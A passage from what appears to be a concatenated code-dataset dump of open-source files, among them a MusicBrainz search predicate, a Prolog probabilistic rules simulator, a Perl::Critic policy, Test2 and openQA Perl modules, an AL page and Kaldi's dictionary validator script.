my $server = HttpServer->new($port, $t->testdir() . '/' . $file)
or die "Can't create test server socket: $!\n";
local $SIG{PIPE} = 'IGNORE';
$server->on('GET', '/key', <<"EOF");
HTTP/1.1 200 OK
Connection: close
$secret
EOF
$server->run();
}
| 36.91195 | 109 | 0.670046 |
ed9ff7eb48f5241ffbf48a8a0d19da9d15a2f8c6 | 893 | pm | Perl | lib/MusicBrainz/Server/EditSearch/Predicate/EditNoteContent.pm | kellnerd/musicbrainz-server | 9e058e10219ea6b8942cfd64160ffe19769f747b | [
"BSD-2-Clause"
] | 577 | 2015-01-15T12:18:50.000Z | 2022-03-16T20:41:57.000Z | lib/MusicBrainz/Server/EditSearch/Predicate/EditNoteContent.pm | kellnerd/musicbrainz-server | 9e058e10219ea6b8942cfd64160ffe19769f747b | [
"BSD-2-Clause"
] | 1,227 | 2015-04-16T01:00:29.000Z | 2022-03-30T15:08:46.000Z | lib/MusicBrainz/Server/EditSearch/Predicate/EditNoteContent.pm | kellnerd/musicbrainz-server | 9e058e10219ea6b8942cfd64160ffe19769f747b | [
"BSD-2-Clause"
] | 280 | 2015-01-04T08:39:41.000Z | 2022-03-10T17:09:59.000Z | package MusicBrainz::Server::EditSearch::Predicate::EditNoteContent;
use Moose;
with 'MusicBrainz::Server::EditSearch::Predicate';
sub operator_cardinality_map {
return (
'includes' => undef,
)
}
sub combine_with_query {
my ($self, $query) = @_;
my @patterns = map {
$_ =~ s/\\/\\\\/g;
$_ =~ s/_/\\_/g;
$_ =~ s/%/\\%/g;
'%' . $_ . '%'
} @{ $self->sql_arguments };
$query->add_where([
'EXISTS (
SELECT TRUE FROM edit_note
WHERE edit_note.text ILIKE ?
AND edit_note.edit = edit.id
)',
\@patterns,
]);
};
1;
=head1 COPYRIGHT AND LICENSE
Copyright (C) 2015-2017 MetaBrainz Foundation
This file is part of MusicBrainz, the open internet music database,
and is licensed under the GPL version 2, or (at your option) any
later version: http://www.gnu.org/licenses/gpl-2.0.txt
=cut
| 20.767442 | 68 | 0.597984 |
ed64dfd51e627ace03cd3495d98bd19a963940bb | 14,867 | pl | Perl | ProbRules.pl | sysbio-bioinf/ProbRules | cfbf0c4746672e775afc5b6909b499a2fbfe5ab1 | [
"Apache-2.0"
] | 3 | 2019-06-21T03:00:03.000Z | 2020-04-13T02:51:49.000Z | ProbRules.pl | sysbio-bioinf/ProbRules | cfbf0c4746672e775afc5b6909b499a2fbfe5ab1 | [
"Apache-2.0"
] | null | null | null | ProbRules.pl | sysbio-bioinf/ProbRules | cfbf0c4746672e775afc5b6909b499a2fbfe5ab1 | [
"Apache-2.0"
] | null | null | null | :- op(50, xfx, ::).
:- op(70, fx, not).
:- discontiguous (::)/2.
:- multifile rule/5.
:- multifile fixed/3.
%! evaluation(+Timepoint:int) is det.
%
% The entry point to this application.
% Computes and prints the state of the probabilistic interactions at
% each timepoint from 0 to Timepoint.
evaluation(S0) :-
succ(S0, S),
initialize_variables(Assoc),
init_visualize(Assoc),
visualize(0, Assoc),
evaluation(1, S, Assoc).
evaluation(S, S, _) :- !.
evaluation(A, S, Assoc) :-
newvalues(A, Assoc, New_Assoc),
visualize(A, New_Assoc),
succ(A, A1),
evaluation(A1, S, New_Assoc).
%! initialize_variables(-Assoc) is det.
%
% Initialize Assoc with the probabilistic terms in the knowledge
% base. Atoms are keys, probabilities are values.
initialize_variables(Assoc) :-
empty_assoc(Assoc0),
setof(X-P, P::X, Interactions),
update_facts_assoc(Interactions, Assoc0, Assoc).
%! init_visualize(+Assoc) is det.
%
% Print a single tab-separated line with the probabilistic
% interaction identifiers that serve as keys in Assoc (sorted asc).
init_visualize(Assoc) :-
assoc_to_keys(Assoc, Xs),
findall((A, B), member(interaction(A, B), Xs), Interactions),
forall(member(Interaction, Interactions),
format('\t(~w)', [Interaction])),
format('~n', []).
%! visualize(+Iteration, +Assoc:association_list) is det.
%
% Print a tab-separated line of interaction probabilities
% (sorted asc). An iteration number is prepended to the line.
visualize(Iteration, Assoc) :-
assoc_to_list(Assoc, Xs),
format('~w\t', [Iteration]),
forall(member(interaction(_,_)-X, Xs), format('~w\t', [X])),
format('~n', []).
%! newvalues(T, Assoc, New_Assoc) is det.
%
% Generate values for the next time point.
% For each interaction (i.e. key) in Assoc do:
% - check which rules are applicable and compute their target scores.
% - take the average and associate it as the new value.
newvalues(T, Assoc, New_Assoc) :-
assoc_to_keys(Assoc, Probabilistic_Atoms),
findall(interaction(A,B),
member(interaction(A,B), Probabilistic_Atoms),
Interactions),
newvalues_helper(T, Interactions, Assoc, New_Interactions),
update_facts_assoc(New_Interactions, Assoc, New_Assoc).
%! average(+Xs:number_list, -Y:number) is det.
%
% Y is the average of the values in Xs.
average(Xs, Y) :-
sum_list(Xs, T),
length(Xs, L),
Y is T / L.
%! newvalues_helper(+Timepoint:int,
%! +Interactions,
%! +Assoc:association_list,
%! +Interaction_Probabilities) is det.
%
% For each interaction in Interactions its probability for timepoint
% Timepoint is computed and stored in Interaction_Probabilities.
%
% The probability of an interaction is computed as follows:
% - If a fixed probability for Interaction at timepoint Timepoint is
% known, this becomes its probability.
% - Otherwise, collect all rules potentially affecting Interaction
% and compute the probability using interaction_probability/4.
newvalues_helper(_, [], _, []) :- !. % Ideally SWI Prolog would be
% able to identify that the empty
% list is mutually exclusive with
% the other clause for these
% arguments, however this is
% currently not the case, hence
% the cut to avoid a useless
% choice point.
newvalues_helper(A, [Interaction | Xs], Assoc, [Interaction-P | Ys]) :-
( static(A, Assoc, Interaction, P), !
; findall(Conditions-(Attack_Rate, Target_Probability),
dynamics(Interaction, Conditions, Target_Probability, Attack_Rate),
Rules),
interaction_probability(Interaction, Assoc, Rules, P)
),
newvalues_helper(A, Xs, Assoc, Ys).
%! static(+Timepoint:int,
%! +Assoc:association_list,
%! +Interaction,
%! -P:probability) is semidet.
%
% Returns the probability P of a given Interaction at timepoint
% Timepoint in case a fixed/3 statement is applicable.
% Fails if not.
static(Timepoint, Assoc, interaction(X, Y), P) :-
clause(fixed(X, Y, Timepoint), Body),
conj_to_list(Body, Body_Literals),
process(Assoc, Body_Literals, Ps),
product(Ps, P).
%! conj_to_list(Xs:conjunction, Ys:list) is det.
%
% Ys is the order-preserved list of terms that made up Xs.
conj_to_list(','(H, Conj), [H | T]) :-
!,
conj_to_list(Conj, T).
conj_to_list(H, [H]).
%! process(+Assoc:association_list,
%! +Xs:list,
%! -Ys:probability_list) is semidet.
%
% Ys are the probabilities associated with their respective
% terms in Xs.
% Xs can contain probabilistic as well as nonprobabilistic terms
% (assumed to be det). The deterministic terms are called using call/1.
% The probability associated with a deterministic term is the
% neutral element for multiplication 1.
process(_, [], []).
process(Assoc, [X|Xs], [P|Ps]) :-
process_literal(Assoc, X, P),
process(Assoc, Xs, Ps).
process_literal(Assoc, X, P) :-
( get_assoc(X, Assoc, P), !
; call(X), P = 1
).
dynamics(interaction(X, Y), Conditions, Target_Probability, Attack_Rate) :-
rule((X, Y), Conditions, Target_Probability, Attack_Rate, _Description).
%! evaluate_conditions(+Conditions:list,
%! +Assoc:association_list,
%! -P:probability) is semidet.
%
% P is the probability that the probabilistic variables in
% Conditions hold.
%
% Conditions contains positive or negated independent probabilistic facts.
% Assoc has interactions (interaction/2) as keys and probabilities
% as values.
% If Conditions = [] then P = 1.
% If length(Conditions, L), L > 0 then a probability is derived from
% a condition by taking its probability from
% Assoc and taking the complement in case it is negated.
% P then equals the product of all probabilities.
evaluate_conditions(Conditions, Assoc, P) :-
maplist(condition_probability(Assoc), Conditions, Probabilities),
product(Probabilities, P).
%! condition_probability(+Assoc:association_list,
%! +Condition,
%! -P:probability) is semidet.
%
% If Condition is positive, then P is the probability specified by
% the interaction/2 associated with Condition
% in Assoc.
% If Condition is negated, then P is the complement of that probability.
condition_probability(Assoc, not (X, Y), P) :-
get_assoc(interaction(X, Y), Assoc, P0),
P is 1 - P0.
condition_probability(Assoc, (X, Y), P) :-
get_assoc(interaction(X, Y), Assoc, P).
%! update_facts_assoc(+Probabilistic_Facts:pairs,
%! +Assoc_In:association_list,
%! -Assoc_Out:association_list) is det.
%
% Assoc_Out is Assoc_In extended with each pair (serving as
% (Key,Value)) of Probabilistic_Facts.
update_facts_assoc([], Assoc, Assoc).
update_facts_assoc([Fact-P | Xs], Assoc0, Assoc) :-
put_assoc(Fact, Assoc0, P, Assoc1),
update_facts_assoc(Xs, Assoc1, Assoc).
%! product(+Xs:numberlist, -P:number) is det.
%
% True if P is the product of the elements in Xs.
product(Xs, P) :-
product_helper(Xs, 1, P).
product_helper([], Acc, P) :-
P is Acc.
product_helper([X | Xs], Acc, P) :-
product_helper(Xs, X * Acc, P).
%! interaction_probability(+Interaction,
%! +Assoc:association_list,
%! +Xs,
%! -P:probability) is semidet.
%
% P is the probability of Interaction by taking into account
% the potential effects of the rules in Xs on its state in the
% previous time point as stored in Assoc.
%
% Format of Xs = [[(i,p)]-(global_attack,on),
% [(x,z), not (y,z)]-(global_attack, on)]
interaction_probability(Interaction, Assoc, Xs, P) :-
findall(P,
(annotated_rules(Xs, World),
evaluate_world(Assoc, Interaction, World, P)),
Ps),
sum_list(Ps, P).
%! evaluate_world(+Assoc:association_list,
%! +Interaction,
%! +Xs,
%! -Probability) is semidet.
%
% Xs is a set of rules associated with a particular Interaction
% evaluated against a particular World. The World in question
% is one world consisting of the variables used in the conditions of
% that set of rules. Status indicates whether a particular Rule is
% active in the World.
%
% - If all the rules are evaluated as false in a particular world,
% then the decay rule applies. The Weight of the world is used for
% the Condition probability in the decay rule formula, except when
% Xs = [], since then the rules affecting the Interaction have no
% conditions (i.e. are always satisfied), in which case the Condition
% probability is 1.
% - If some rule is evaluated as true, then the probability of
% each true rule is evaluated separately using the effective
% rule formula, and then resulting probability are averaged out.
%
% Note: format of Xs: for X in Xs:
% X = World-Condition-(Attack_Rate, Target_Probability)-Status
% where
% - World = one World (truth table generated) over the variables
% used in the conditions of the rules affecting Interaction.
% - Condition = the Condition that triggers a particular rule
% on Interaction.
% - Attack_Rate = The attack rate of that some rule.
% - Target_Probability = The target probability of that same rule.
% - Status = Whether Condition actually holds in World.
evaluate_world(Assoc, Interaction, Xs, Probability) :-
( maplist(status(false), Xs) ->
get_assoc(global_decay, Assoc, Global_Decay),
get_assoc(Interaction, Assoc, Previous_P),
Initial_P :: Interaction,
( memberchk(World-_-_-_, Xs) ->
evaluate_conditions(World, Assoc, Condition)
;
Condition = 1
),
default_decay_rule_formula(Condition, Global_Decay, Initial_P, Previous_P, Probability)
;
include(status(true), Xs, Ys),
maplist(evaluate(Assoc, Interaction), Ys, Ps),
average(Ps, Probability)
).
%! evaluate(+Assoc,
%! +Interaction,
%! +World_Rule,
%! -P) is semidet.
%
% World_Rule = World-_-(Target_Probability_Atom,Attack_Rate_Atom)-_
%
% P is the probability as specified by the formal effective rule
% formula for Interaction where
% - the condition probability is the probability of World.
% - the Target Probability and Attack Rate is explicitly provided
% through atoms that can be used as keys in Assoc.
% - Interaction is used as a key in Assoc to retrieve its
% probability at the previous time point.
evaluate(Assoc, Interaction, World-_-(Target_Probability_Atom, Attack_Rate_Atom)-_, P) :-
evaluate_conditions(World, Assoc, Condition_P),
get_assoc(Target_Probability_Atom, Assoc, Target_Probability),
get_assoc(Attack_Rate_Atom, Assoc, Attack_Rate),
get_assoc(Interaction, Assoc, Previous_P),
effective_rule_formula(Condition_P, Target_Probability, Attack_Rate, Previous_P, P).
%! default_decay_rule_formula(+Condition:probability,
%! +Global_Decay:probability,
%! +Initial_P:probability,
%! +Previous_P:probability,
%! -P:probability) is det.
%
% P is the probability as specified by the formal default decay rule formula.
default_decay_rule_formula(Condition, Global_Decay, Initial_P, Previous_P, P) :-
P is Condition * ((1 - Global_Decay) * Previous_P + Global_Decay * Initial_P).
%! effective_rule_formula(+Condition:probability,
%! +Target_Probability:probability,
%! +Attack_Rate:probability,
%! +Previous_P:probability,
%! -P:probability) is det.
%
% P is the probability as specified by the formal effective rule formula.
effective_rule_formula(Condition, Target_Probability, Attack_Rate, Previous_P, P) :-
P is Condition * ((Target_Probability * Attack_Rate) + (1 - Attack_Rate ) * Previous_P).
status(State, _-_-_-State).
%! annotated_rules(+Rules, -World_Rules_Satisfied:hyphen_quadruple_list) is multi
%
% World_Rules_Satisfied is a list of quadruples.
% Each binding of World_Rules_Satisfied is a list of Rules
% evaluated against a particular World. Upon backtracking a list for
% each possible world is returned.
annotated_rules(Rules, World_Rules_Satisfied) :-
condition_TA_Pairs_condition_set(Rules, Condition_Variables),
random_variables_world(Condition_Variables, World),
maplist(condition_satisfaction_in_world(World), Rules, World_Rules_Satisfied).
%! condition_satisfaction_in_world(+World,
%! +Condition_L:hyphen_pair,
%! -World_Conditions_L_State:hyphen_quadruple)
%! is det.
%
% State is true if Conditions are satisfied by World.
% That is, if each element in Conditions is a member of World.
% State is false otherwise.
condition_satisfaction_in_world(World, Conditions-L, World-Conditions-L-State) :-
( forall(member(Condition, Conditions), member(Condition, World))
-> State = true
; State = false
).
%! condition_TA_Pairs_condition_set(+Condition_TA_Pairs:pairs,
%! -Condition_Set:set) is det.
%
% Condition_Set is the set of interactions contained in the
% keys (a key is a list of positive or negated interactions) of
% Condition_TA_Pairs.
condition_TA_Pairs_condition_set(Condition_TA_Pairs, Condition_Set) :-
pairs_keys(Condition_TA_Pairs, Condition_Lists),
append(Condition_Lists, Conditions),
peeled_negation(Conditions, Positive_Conditions),
sort(Positive_Conditions, Condition_Set).
%! peeled_negation(+Xs:list, -Ys:list) is det.
%
% True if Ys is Xs with one layer of not/1 peeled off.
% not/1 represents negation.
% If an element in Xs is negated, then that single negation is removed in Ys
% If an element in Xs is not negated, then that element is left unchanged
% in Ys.
peeled_negation([], []).
peeled_negation([X | Xs], [Y | Ys]) :-
( X = not Condition
-> Y = Condition
; Y = X
),
peeled_negation(Xs, Ys).
%! random_variables_world(+In:list, -Out:list) is multi.
%
% Out is a row in the truth table derived from the variables
% in In. Upon backtracking each row from the truth table is
% generated.
%
% if length(In, L), L>0 then random_variables_world/2 succeeds 2**L
% times.
% if length(In, 0) then random_variables_world/2 succeeds exactly
% once with Out = [].
random_variables_world([], []).
random_variables_world([X | Xs], [X | Ys]) :-
random_variables_world(Xs, Ys).
random_variables_world([X | Xs], [not(X) | Ys]) :-
random_variables_world(Xs, Ys).
| 38.615584 | 92 | 0.670613 |
ed7bf074a4a940916e8194ef89ef8fe247961ace | 2,591 | pm | Perl | lib/Perl/Critic/Policy/ControlStructures/ProhibitCStyleForLoops.pm | rurban/Perl-Critic | 25b8b19070c92f90a0104394a881aa65752a5fdc | [
"Artistic-1.0"
] | null | null | null | lib/Perl/Critic/Policy/ControlStructures/ProhibitCStyleForLoops.pm | rurban/Perl-Critic | 25b8b19070c92f90a0104394a881aa65752a5fdc | [
"Artistic-1.0"
] | null | null | null | lib/Perl/Critic/Policy/ControlStructures/ProhibitCStyleForLoops.pm | rurban/Perl-Critic | 25b8b19070c92f90a0104394a881aa65752a5fdc | [
"Artistic-1.0"
] | null | null | null | package Perl::Critic::Policy::ControlStructures::ProhibitCStyleForLoops;
use 5.006001;
use strict;
use warnings;
use Readonly;
use Perl::Critic::Utils qw{ :characters :severities };
use base 'Perl::Critic::Policy';
our $VERSION = '1.121_01';
#-----------------------------------------------------------------------------
Readonly::Scalar my $DESC => q{C-style "for" loop used};
Readonly::Scalar my $EXPL => [ 100 ];
#-----------------------------------------------------------------------------
sub supported_parameters { return () }
sub default_severity { return $SEVERITY_LOW }
sub default_themes { return qw( core pbp maintenance ) }
sub applies_to { return 'PPI::Structure::For' }
#-----------------------------------------------------------------------------
sub violates {
my ( $self, $elem, undef ) = @_;
if ( _is_cstyle($elem) ) {
return $self->violation( $DESC, $EXPL, $elem );
}
return; #ok!
}
sub _is_cstyle {
my $elem = shift;
my $nodes_ref = $elem->find('PPI::Token::Structure');
return if !$nodes_ref;
my @semis = grep { $_ eq $SCOLON } @{$nodes_ref};
return scalar @semis == 2;
}
1;
__END__
#-----------------------------------------------------------------------------
=pod
=head1 NAME
Perl::Critic::Policy::ControlStructures::ProhibitCStyleForLoops - Write C<for(0..20)> instead of C<for($i=0; $i<=20; $i++)>.
=head1 AFFILIATION
This Policy is part of the core L<Perl::Critic|Perl::Critic>
distribution.
=head1 DESCRIPTION
The 3-part C<for> loop that Perl inherits from C is butt-ugly, and
only really necessary if you need irregular counting. The very
Perlish C<..> operator is much more elegant and readable.
for($i=0; $i<=$max; $i++){ #ick!
do_something($i);
}
for(0..$max){ #very nice
do_something($_);
}
=head1 CONFIGURATION
This Policy is not configurable except for the standard options.
=head1 AUTHOR
Jeffrey Ryan Thalhammer <jeff@imaginative-software.com>
=head1 COPYRIGHT
Copyright (c) 2005-2011 Imaginative Software Systems. All rights reserved.
This program is free software; you can redistribute it and/or modify
it under the same terms as Perl itself. The full text of this license
can be found in the LICENSE file included with this module.
=cut
# Local Variables:
# mode: cperl
# cperl-indent-level: 4
# fill-column: 78
# indent-tabs-mode: nil
# c-indentation-style: bsd
# End:
# ex: set ts=8 sts=4 sw=4 tw=78 ft=perl expandtab shiftround :
| 24.913462 | 124 | 0.575839 |
ed36f4e250944eb7809940be01b99c5a6f71e816 | 1,431 | pm | Perl | fatlib/Test2/Hub/Interceptor.pm | AntonioJavierRP/CC-18-19 | fbe224bdf8abd3cf8aa42cf7b7b0c0f9ebd2ca04 | [
"Artistic-2.0"
] | 2 | 2021-10-20T00:25:39.000Z | 2021-11-08T12:52:42.000Z | fatlib/Test2/Hub/Interceptor.pm | AntonioJavierRP/CC-18-19 | fbe224bdf8abd3cf8aa42cf7b7b0c0f9ebd2ca04 | [
"Artistic-2.0"
] | null | null | null | fatlib/Test2/Hub/Interceptor.pm | AntonioJavierRP/CC-18-19 | fbe224bdf8abd3cf8aa42cf7b7b0c0f9ebd2ca04 | [
"Artistic-2.0"
] | 1 | 2022-03-14T06:41:16.000Z | 2022-03-14T06:41:16.000Z | package Test2::Hub::Interceptor;
use strict;
use warnings;
our $VERSION = '1.302120';
use Test2::Hub::Interceptor::Terminator();
BEGIN { require Test2::Hub; our @ISA = qw(Test2::Hub) }
use Test2::Util::HashBase;
sub init {
my $self = shift;
$self->SUPER::init;
$self->{+NESTED} = 0;
}
sub inherit {
my $self = shift;
my ($from, %params) = @_;
$self->{+NESTED} = 0;
if ($from->{+IPC} && !$self->{+IPC} && !exists($params{ipc})) {
my $ipc = $from->{+IPC};
$self->{+IPC} = $ipc;
$ipc->add_hub($self->{+HID});
}
}
sub terminate {
my $self = shift;
my ($code) = @_;
eval {
no warnings 'exiting';
last T2_SUBTEST_WRAPPER;
};
my $err = $@;
# Fallback
die bless(\$err, 'Test2::Hub::Interceptor::Terminator');
}
1;
__END__
=pod
=encoding UTF-8
=head1 NAME
Test2::Hub::Interceptor - Hub used by interceptor to grab results.
=head1 SOURCE
The source code repository for Test2 can be found at
F<http://github.com/Test-More/test-more/>.
=head1 MAINTAINERS
=over 4
=item Chad Granum E<lt>exodist@cpan.orgE<gt>
=back
=head1 AUTHORS
=over 4
=item Chad Granum E<lt>exodist@cpan.orgE<gt>
=back
=head1 COPYRIGHT
Copyright 2017 Chad Granum E<lt>exodist@cpan.orgE<gt>.
This program is free software; you can redistribute it and/or
modify it under the same terms as Perl itself.
See F<http://dev.perl.org/licenses/>
=cut
| 16.078652 | 67 | 0.621244 |
ed1d5d2102fb3338c9a1a9f143b5a143b9d52167 | 667 | pm | Perl | lib/containers/basetest.pm | acerv/os-autoinst-distri-opensuse | 0e0cfca02f3a86323682c511a1efa926c7f0df3a | [
"FSFAP"
] | 2 | 2017-11-29T19:04:30.000Z | 2017-11-29T19:04:31.000Z | lib/containers/basetest.pm | acerv/os-autoinst-distri-opensuse | 0e0cfca02f3a86323682c511a1efa926c7f0df3a | [
"FSFAP"
] | 2 | 2021-12-10T20:25:24.000Z | 2021-12-13T16:45:47.000Z | lib/containers/basetest.pm | acerv/os-autoinst-distri-opensuse | 0e0cfca02f3a86323682c511a1efa926c7f0df3a | [
"FSFAP"
] | 2 | 2015-02-27T07:34:58.000Z | 2015-05-15T09:24:55.000Z | # SUSE's openQA tests
#
# Copyright 2021 SUSE LLC
# SPDX-License-Identifier: FSFAP
# Summary: Base class for container tests
# Maintainer: qac team <qa-c@suse.de>
package containers::basetest;
use containers::docker;
use containers::podman;
use Mojo::Base 'opensusebasetest';
sub containers_factory {
my ($self, $runtime) = @_;
my $engine;
if ($runtime eq 'docker') {
$engine = containers::docker->new();
}
elsif ($runtime eq 'podman') {
$engine = containers::podman->new();
}
else {
die("Unknown runtime $runtime. Only 'docker' and 'podman' are allowed.");
}
$engine->init();
return $engine;
}
1;
| 20.84375 | 81 | 0.631184 |
eda420924e14351b27ebcd0672a76af2840d5f9e | 941 | al | Perl | Apps/IN/INTDS/app/TDSBase/src/page/SectionDetail.Page.al | MiguelMercadoActual/ALAppExtensions | 97ee3823053eb32fa7e38dc3d1e7a89bdcca8d7b | [
"MIT"
] | 337 | 2019-05-07T06:04:40.000Z | 2022-03-31T10:07:42.000Z | Apps/IN/INTDS/app/TDSBase/src/page/SectionDetail.Page.al | MiguelMercadoActual/ALAppExtensions | 97ee3823053eb32fa7e38dc3d1e7a89bdcca8d7b | [
"MIT"
] | 14,850 | 2019-05-07T06:04:27.000Z | 2022-03-31T19:53:28.000Z | Apps/IN/INTDS/app/TDSBase/src/page/SectionDetail.Page.al | MiguelMercadoActual/ALAppExtensions | 97ee3823053eb32fa7e38dc3d1e7a89bdcca8d7b | [
"MIT"
] | 374 | 2019-05-09T10:08:14.000Z | 2022-03-31T17:48:32.000Z | page 18688 "Section Detail"
{
PageType = StandardDialog;
SourceTable = "TDS Section";
layout
{
area(Content)
{
group(Details)
{
field(SectionDetail; SectionDetail)
{
ApplicationArea = Basic, Suite;
Caption = 'Section Details';
MultiLine = true;
ToolTip = 'Specify additional details for the TDS section.';
}
}
}
}
trigger OnQueryClosePage(CloseAction: Action): Boolean
begin
if CloseAction in [Action::OK, Action::LookupOK] then
TDSEntityManagement.SetDetailTxt(SectionDetail, Rec);
end;
trigger OnOpenPage()
begin
SectionDetail := TDSEntityManagement.GetDetailTxt(rec);
end;
var
TDSEntityManagement: Codeunit "TDS Entity Management";
SectionDetail: Text;
} | 25.432432 | 80 | 0.544102 |
eda3b3c81ff3ea2dd45fd2202ee03ffdbb28fedd | 11,748 | pl | Perl | egs/wsj/s5/utils/validate_dict_dir.pl | liu4lin/kaldi-trunk | 2486bf90b02128bc5d480bd6f8daa2b47b274c66 | [
"Apache-2.0"
] | 1 | 2019-02-06T09:31:59.000Z | 2019-02-06T09:31:59.000Z | egs/wsj/s5/utils/validate_dict_dir.pl | Shuang777/kaldi | 3df67141b55cfd5e2ba7305a72e795e7706d8d30 | [
"Apache-2.0"
] | null | null | null | egs/wsj/s5/utils/validate_dict_dir.pl | Shuang777/kaldi | 3df67141b55cfd5e2ba7305a72e795e7706d8d30 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/perl
# Apache 2.0.
# Guoguo Chen (guoguo@jhu.edu)
# Daniel Povey (dpovey@gmail.com)
#
# Validation script for data/local/dict
if(@ARGV != 1) {
die "Usage: validate_dict_dir.pl dict_directory\n";
}
$dict = shift @ARGV;
$dict =~ s:/$::;
$exit = 0;
$success = 1; # this is re-set each time we read a file.
sub set_to_fail { $exit = 1; $success = 0; }
# Checking silence_phones.txt -------------------------------
print "Checking $dict/silence_phones.txt ...\n";
if(-z "$dict/silence_phones.txt") {print "--> ERROR: $dict/silence_phones.txt is empty or not exists\n"; exit 1;}
if(!open(S, "<$dict/silence_phones.txt")) {print "--> ERROR: fail to open $dict/silence_phones.txt\n"; exit 1;}
$idx = 1;
%silence = ();
print "--> reading $dict/silence_phones.txt\n";
while(<S>) {
if (! s/\n$//) {
print "--> ERROR: last line '$_' of $dict/silence_phones.txt does not end in newline.\n";
set_to_fail();
}
my @col = split(" ", $_);
if (@col == 0) {
set_to_fail();
print "--> ERROR: empty line in $dict/silence_phones.txt (line $idx)\n";
}
foreach(0 .. @col-1) {
my $p = $col[$_];
if($silence{$p}) {set_to_fail(); print "--> ERROR: phone \"$p\" duplicates in $dict/silence_phones.txt (line $idx)\n"; }
else {$silence{$p} = 1;}
if ($p =~ m/_$/ || $p =~ m/#/ || $p =~ m/_[BESI]$/){
set_to_fail();
print "--> ERROR: phone \"$p\" has disallowed written form";
}
}
$idx ++;
}
close(S);
$success == 0 || print "--> $dict/silence_phones.txt is OK\n";
print "\n";
# Checking optional_silence.txt -------------------------------
print "Checking $dict/optional_silence.txt ...\n";
if(-z "$dict/optional_silence.txt") {print "--> ERROR: $dict/optional_silence.txt is empty or not exists\n"; exit 1;}
if(!open(OS, "<$dict/optional_silence.txt")) {print "--> ERROR: fail to open $dict/optional_silence.txt\n"; exit 1;}
$idx = 1;
$success = 1;
print "--> reading $dict/optional_silence.txt\n";
while(<OS>) {
chomp;
my @col = split(" ", $_);
if ($idx > 1 or @col > 1) {
set_to_fail(); print "--> ERROR: only 1 phone expected in $dict/optional_silence.txt\n";
} elsif (!$silence{$col[0]}) {
set_to_fail(); print "--> ERROR: phone $col[0] not found in $dict/silence_phones.txt\n";
}
$idx ++;
}
close(OS);
$success == 0 || print "--> $dict/optional_silence.txt is OK\n";
print "\n";
# Checking nonsilence_phones.txt -------------------------------
print "Checking $dict/nonsilence_phones.txt ...\n";
if(-z "$dict/nonsilence_phones.txt") {print "--> ERROR: $dict/nonsilence_phones.txt is empty or not exists\n"; exit 1;}
if(!open(NS, "<$dict/nonsilence_phones.txt")) {print "--> ERROR: fail to open $dict/nonsilence_phones.txt\n"; exit 1;}
$idx = 1;
%nonsilence = ();
$success = 1;
print "--> reading $dict/nonsilence_phones.txt\n";
while(<NS>) {
if (! s/\n$//) {
print "--> ERROR: last line '$_' of $dict/nonsilence_phones.txt does not end in newline.\n";
set_to_fail();
}
my @row = split(" ", $_);
if (@row == 0) {
set_to_fail();
print "--> ERROR: empty line in $dict/nonsilence_phones.txt (line $idx)\n";
}
foreach(0 .. @row-1) {
my $p = $row[$_];
if($nonsilence{$p}) {set_to_fail(); print "--> ERROR: phone \"$p\" duplicates in $dict/nonsilence_phones.txt (line $idx)\n"; }
else {$nonsilence{$p} = 1;}
if ($p =~ m/_$/ || $p =~ m/#/ || $p =~ m/_[BESI]$/){
set_to_fail();
print "--> ERROR: phone \"$p\" has disallowed written form";
}
}
$idx ++;
}
close(NS);
$success == 0 || print "--> $dict/nonsilence_phones.txt is OK\n";
print "\n";
# Checking disjoint -------------------------------
sub intersect {
my ($a, $b) = @_;
@itset = ();
%itset = ();
foreach(keys %$a) {
if(exists $b->{$_} and !$itset{$_}) {
push(@itset, $_);
$itset{$_} = 1;
}
}
return @itset;
}
print "Checking disjoint: silence_phones.txt, nonsilence_phones.txt\n";
@itset = intersect(\%silence, \%nonsilence);
if(@itset == 0) {print "--> disjoint property is OK.\n";}
else {set_to_fail(); print "--> ERROR: silence_phones.txt and nonsilence_phones.txt has overlap: "; foreach(@itset) {print "$_ ";} print "\n";}
print "\n";
sub check_lexicon {
my ($lexfn, $pron_probs) = @_;
print "Checking $lexfn\n";
my %seen_line = {};
if(-z "$lexfn") {set_to_fail(); print "--> ERROR: $lexfn is empty or does not exist\n";}
if(!open(L, "<$lexfn")) {set_to_fail(); print "--> ERROR: fail to open $lexfn\n";}
$idx = 1;
$success = 1;
print "--> reading $lexfn\n";
while (<L>) {
if (defined $seen_line{$_}) {
print "--> ERROR: line '$_' of $lexfn is repeated\n";
set_to_fail();
}
$seen_line{$_} = 1;
if (! s/\n$//) {
print "--> ERROR: last line '$_' of $lexfn does not end in newline.\n";
set_to_fail();
}
my @row = split(" ", $_);
$word = shift @row;
if (!defined $word) {
set_to_fail(); print "--> ERROR: empty lexicon line in $lexfn\n";
}
if ($pron_probs) {
$prob = shift @row;
if (!($prob > 0.0 && $prob <= 1.0)) {
set_to_fail(); print "--> ERROR: bad pron-prob in lexicon-line '$_', in $lexfn\n";
}
}
foreach (0 .. @row-1) {
if (!$silence{@row[$_]} and !$nonsilence{@row[$_]}) {
set_to_fail(); print "--> ERROR: phone \"@row[$_]\" is not in {, non}silence.txt (line $idx)\n";
}
}
$idx ++;
}
%seen_line = {};
close(L);
$success == 0 || print "--> $lexfn is OK\n";
print "\n";
}
if (-f "$dict/lexicon.txt") { check_lexicon("$dict/lexicon.txt", 0); }
if (-f "$dict/lexiconp.txt") { check_lexicon("$dict/lexiconp.txt", 1); }
if (!(-f "$dict/lexicon.txt" || -f "$dict/lexiconp.txt")) {
print "--> ERROR: neither lexicon.txt or lexiconp.txt exist in directory $dir\n";
set_to_fail();
}
# If both lexicon.txt and lexiconp.txt exist, we check that they correspond to
# each other. If not, it could be that the user overwrote one and we need to
# regenerate the other, but we don't know which is which.
if ( (-f "$dict/lexicon.txt") && (-f "$dict/lexiconp.txt")) {
print "Checking that lexicon.txt and lexiconp.txt match\n";
if (!open(L, "<$dict/lexicon.txt") || !open(P, "<$dict/lexiconp.txt")) {
die "Error opening lexicon.txt and/or lexiconp.txt"; # already checked, so would be code error.
}
my $line_num = 0;
while(<L>) {
$line_num++;
if (! s/\n$//) {
print "--> ERROR: last line '$_' of $dict/lexicon.txt does not end in newline.\n";
set_to_fail();
last;
}
@A = split;
$x = <P>;
if ($x !~ s/\n$//) {
print "--> ERROR: last line '$x' of $dict/lexiconp.txt does not end in newline.\n";
set_to_fail();
last;
}
if (!defined $x) {
print "--> ERROR: lexicon.txt and lexiconp.txt have different numbers of lines (mismatch); delete one.\n";
set_to_fail();
last;
}
@B = split(" ", $x);
$w = shift @B;
if ($w eq "<s>" || $w eq "</s>") {
print "--> ERROR: lexicon.txt contains forbidden word $w\n";
set_to_fail();
}
